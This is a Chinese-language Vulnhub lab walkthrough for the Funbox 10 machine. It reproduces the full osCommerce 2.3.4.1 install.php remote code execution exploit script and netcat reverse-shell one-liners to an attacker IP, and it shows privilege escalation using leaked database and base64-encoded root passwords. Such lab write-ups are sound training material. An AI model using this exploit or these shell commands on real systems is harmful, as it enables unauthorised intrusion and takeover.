Vulnhub之Funbox 10详细测试过程(不同的获得Shell的方法)
Funbox 10
靶机信息
名称: Funbox: Under Construction!
地址:
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:75:6d:38 1 60 PCS Systemtechnik GmbH
192.168.56.158 08:00:27:da:84:f9 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.158
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.158 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 20:57 EST
Nmap scan report for localhost (192.168.56.158)
Host is up (0.00013s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:35:c4:90:87:20:4e:b2:59:78:19:da:da:8b:c6:ed (RSA)
| 256 55:7c:a9:99:35:1b:0e:c1:ff:5d:12:a2:1c:70:7b:84 (ECDSA)
|_ 256 20:97:69:f0:8f:e0:c9:07:ee:b0:4f:02:fb:9b:ca:0c (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: funbox10, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| ssl-cert: Subject: commonName=funbox10
| Not valid before: 2021-06-24T17:27:09
|_Not valid after: 2031-06-22T17:27:09
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Khronos 2.0 - Slides
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL PIPELINING RESP-CODES TOP SASL CAPA AUTH-RESP-CODE
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 OK post-login LITERAL+ more IDLE Pre-login ID capabilities listed LOGINDISABLEDA0001 have LOGIN-REFERRALS ENABLE SASL-IR
MAC Address: 08:00:27:DA:84:F9 (Oracle VirtualBox virtual NIC)
Service Info: Host: funbox10; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds
NMAP扫描结果表明目标主机有5个开放端口:22(SSH)、25(SMTP)、80(HTTP)、110(POP3)、143(IMAP)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ nikto -h http://192.168.56.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.158
+ Target Hostname: 192.168.56.158
+ Target Port: 80
+ Start Time: 2023-01-08 21:01:12 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 9c86, size: 5c6348ecdbc00, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7918 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-01-08 21:02:14 (GMT-5) (62 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ gobuster dir -u http://192.168.56.158 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.158
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/08 21:03:06 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.158/images/]
/catalog (Status: 301) [Size: 318] [--> http://192.168.56.158/catalog/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.158/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.158/js/]
/server-status (Status: 403) [Size: 279]
Progress: 217042 / 220561 (98.40%)
===============================================================
2023/01/08 21:03:33 Finished
===============================================================
Gobuster工具发现了/catalog目录,访问该目录得知CMS为osCommerce 2.3.4.1
查询有无相应的漏洞可利用?
──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ searchsploit oscommerce 2.3.4.1
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
osCommerce 2.3.4.1 - 'currency' SQL Injection | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Injection | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injection | php/webapps/46330.txt
osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting | php/webapps/49103.txt
osCommerce 2.3.4.1 - Arbitrary File Upload | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution | php/webapps/44374.py
osCommerce 2.3.4.1 - Remote Code Execution (2) | php/webapps/50128.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ searchsploit -m php/webapps/50128.py
Exploit: osCommerce 2.3.4.1 - Remote Code Execution (2)
URL: https://www.exploit-db.com/exploits/50128
Path: /usr/share/exploitdb/exploits/php/webapps/50128.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/Vulnhub/Funbox10/50128.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ ls
50128.py nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ cat 50128.py
# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2)
# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin
# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: https://www.oscommerce.com/
# Version: osCommerce 2.3.4
# Tested on: Windows
import requests
import sys
if(len(sys.argv) != 2):
print("please specify the osCommerce url")
print("format: python3 osCommerce2_3_4RCE.py <url>")
print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog")
sys.exit(0)
baseUrl = sys.argv[1]
testVulnUrl = baseUrl + '/install/install.php'
def rce(command):
#targeting the finish step which is step 4
targetUrl = baseUrl + '/install/install.php?step=4'
payload = "');"
payload += "passthru('" + command + "');" # injecting system command here
payload += "/*"
#injecting parameter
data = {
'DIR_FS_DOCUMENT_ROOT': './',
'DB_DATABASE' : payload
}
response = requests.post(targetUrl, data=data)
if(response.status_code == 200):
#print('[*] Successfully injected payload to config file')
readCMDUrl = baseUrl + '/install/includes/configure.php'
cmd = requests.get(readCMDUrl)
commandRsl = cmd.text.split('\n')
if(cmd.status_code == 200):
#print('[*] System Command Execution Completed')
#removing the error message above
for i in range(2, len(commandRsl)):
print(commandRsl[i])
else:
return '[!] Configure.php not found'
else:
return '[!] Fail to inject payload'
#testing vulnerability accessing the directory
test = requests.get(testVulnUrl)
#checking the install directory still exist or able to access or not
if(test.status_code == 200):
print('[*] Install directory still available, the host likely vulnerable to the exploit.')
#testing system command injection
print('[*] Testing injecting system command to test vulnerability')
cmd = 'whoami'
print('User: ', end='')
err = rce(cmd)
if(err != None):
print(err)
sys.exit(0)
while(True):
cmd = input('RCE_SHELL$ ')
err = rce(cmd)
if(err != None):
print(err)
sys.exit(0)
else:
print('[!] Install directory not found, the host is not vulnerable')
sys.exit(0)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ python 50128.py http://192.168.56.158/catalog
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: RCE_SHELL$ id
RCE_SHELL$ whoami
RCE_SHELL$ which nc
RCE_SHELL$ ls
configure.php.bak
functions
RCE_SHELL$ cat configure.php.bak
define('HTTPS_SERVER', '://');
define('ENABLE_SSL', false);
define('HTTP_COOKIE_DOMAIN', 'funbox10');
define('HTTPS_COOKIE_DOMAIN', '');
define('HTTP_COOKIE_PATH', '/');
define('HTTPS_COOKIE_PATH', '/');
define('DIR_WS_HTTP_CATALOG', '/');
define('DIR_WS_HTTPS_CATALOG', '/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', './');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'jack');
define('DB_SERVER_PASSWORD', 'yellow');
define('DB_DATABASE', 'c3VzYW46c2hhZG93_catalog');passthru('ls -la');/*');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?>
RCE_SHELL$
执行下面的语句获得反弹的Shell
RCE_SHELL$ ls;which nc
configure.php.bak
functions
/bin/nc
RCE_SHELL$ ls;nc -e /bin/bash 192.168.56.146 5555
configure.php.bak
functions
RCE_SHELL$ ls;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.146 5555 >/tmp/f
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.158] 45132
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which pythonn
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox10:/var/www/html/catalog/install/includes$
提权
从前面configure.php.bak文件得知数据库的用户名和密码为:
username:jack
password:yellow
这会不会也是系统的用户名和密码,试一下,切换到jack用户
www-data@funbox10:/home$ su jack
su jack
Password: yellow
jack@funbox10:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K Jun 24 2021 .
drwxr-xr-x 23 root root 4.0K Jun 25 2021 ..
drwx------ 2 chuck chuck 4.0K Jul 17 2021 chuck
drwx------ 3 jack jack 4.0K Jul 17 2021 jack
drwx------ 3 joe joe 4.0K Jul 19 2021 joe
drwx------ 3 susan susan 4.0K Jul 19 2021 susan
jack@funbox10:/home$ cd jack
cd jack
jack@funbox10:~$ ls -alh
ls -alh
total 40K
drwx------ 3 jack jack 4.0K Jul 17 2021 .
drwxr-xr-x 6 root root 4.0K Jun 24 2021 ..
-rw------- 1 jack jack 10 Jul 17 2021 .bash_history
-rwxr-xr-x 1 jack jack 220 Jun 24 2021 .bash_logout
-rwxr-xr-x 1 jack jack 3.7K Jun 24 2021 .bashrc
drwx------ 2 jack jack 4.0K Jul 17 2021 .cache
-rwxr-xr-x 1 jack jack 655 Jun 24 2021 .profile
-rw-rw-r-- 1 jack jack 74 Jul 17 2021 .selected_editor
--w------- 1 root root 13 Jul 17 2021 user.txt
-rw------- 1 jack jack 589 Jul 17 2021 .viminfo
jack@funbox10:~$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
jack@funbox10:~$ cat .bash_history
cat .bash_history
exit
exit
jack@funbox10:~$
在一个很不起眼的目录中找到了下面的文件(linpeas.sh脚本并没有识别出)
jack@funbox10:/usr/share$ cd doc/examples
cd doc/examples
jack@funbox10:/usr/share/doc/examples$ ls
ls
cron.sh
jack@funbox10:/usr/share/doc/examples$ ls -alh cron.sh
ls -alh cron.sh
-rwxr-xr-x 1 root root 90 Jul 17 2021 cron.sh
jack@funbox10:/usr/share/doc/examples$ cat cron.sh
cat cron.sh
# cron.sh sample file
# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==
jack@funbox10:/usr/share/doc/examples$
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ echo 'LXUgcm9vdCAtcCByZnZiZ3QhIQ==' | base64 -d
-u root -p rfvbgt!!
这就是root用户的密码
jack@funbox10:/usr/share/doc/examples$ su - root
su - root
Password: rfvbgt!!
root@funbox10:~# cd /root
cd /root
root@funbox10:~# ls -alh
ls -alh
total 3.0M
drwx------ 2 root root 4.0K Jul 19 2021 .
drwxr-xr-x 23 root root 4.0K Jun 25 2021 ..
-rw------- 1 root root 29 Jul 19 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
-rw------- 1 root root 544 Jul 17 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 3.0M Aug 22 2019 pspy64
-rw-r--r-- 1 root root 1.1K Jul 17 2021 root.txt
-rw-r--r-- 1 root root 74 Jul 17 2021 .selected_editor
-rw------- 1 root root 6.5K Jul 19 2021 .viminfo
-rw-r--r-- 1 root root 229 Jan 9 02:52 .wget-hsts
root@funbox10:~# cat root.txt
cat root.txt
_____ _
| ___| _ _ __ | |__ _____ ___
| |_ | | | | '_ \| '_ \ / _ \ \/ (_)
| _|| |_| | | | | |_) | (_) > < _
|_| \__,_|_| |_|_.__/ \___/_/\_(_)
_ _ _ _ _ _ _
| | | |_ __ __| | ___ _ __ ___ ___ _ __ | |_ _ __ _ _ ___| |_(_) ___ _ __ | |
| | | | '_ \ / _` |/ _ \ '__| / __/ _ \| '_ \| __| '__| | | |/ __| __| |/ _ \| '_ \ | |
| |_| | | | | (_| | __/ | | (_| (_) | | | | |_| | | |_| | (__| |_| | (_) | | | | |_|
\___/|_| |_|\__,_|\___|_| \___\___/|_| |_|\__|_| \__,_|\___|\__|_|\___/|_| |_| (_)
You did it !!!
I look forward to see this on Twitter: @0815R2d2
root@funbox10:~#
经验教训
- 提权的难点在于cron.sh脚本的发现,
STRIVE FOR PROGRESS,NOT FOR PERFECTION